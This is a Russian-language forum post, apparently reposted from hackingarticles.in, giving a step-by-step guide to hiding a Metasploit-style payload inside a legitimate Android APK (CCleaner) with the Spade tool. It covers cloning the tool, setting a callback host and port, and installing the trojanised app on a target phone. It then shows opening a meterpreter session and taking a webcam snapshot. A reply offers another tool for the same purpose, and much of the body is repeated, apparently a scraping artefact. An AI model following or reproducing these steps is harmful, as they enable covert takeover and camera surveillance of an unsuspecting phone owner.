Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней.
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
После успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport > 4444
Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.
Видим привилегии, которые нам доступны:
Готовый файл сохраняется в директории /root/spade
На запрос этой настройки отвечаем утвердительно:
Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:
Попробуем осмотреться в системе:
Все работает, теперь можно испытать работу, к примеру, камеры:
И эта команда срабатывает успешно:
На этом все, спасибо за внимание.
Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал - http://www.hackingarticles.in/hack-android-phone-using-spade-apk-backdoor/
Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней.
Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.gitПосле успешного выполнения команды, вводим следующее:
> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)
После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.
> lhost > 192.168.0.103
> lport > 4444
Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.
Видим привилегии, которые нам доступны:
Готовый файл сохраняется в директории /root/spade
На запрос этой настройки отвечаем утвердительно:
Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:
Попробуем осмотреться в системе:
Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snapИ эта команда срабатывает успешно:
На этом все, спасибо за внимание.
Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал - http://www.hackingarticles.in/hack-android-phone-using-spade-apk-backdoor/
Последнее редактирование:
Я один прикрываю)
Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
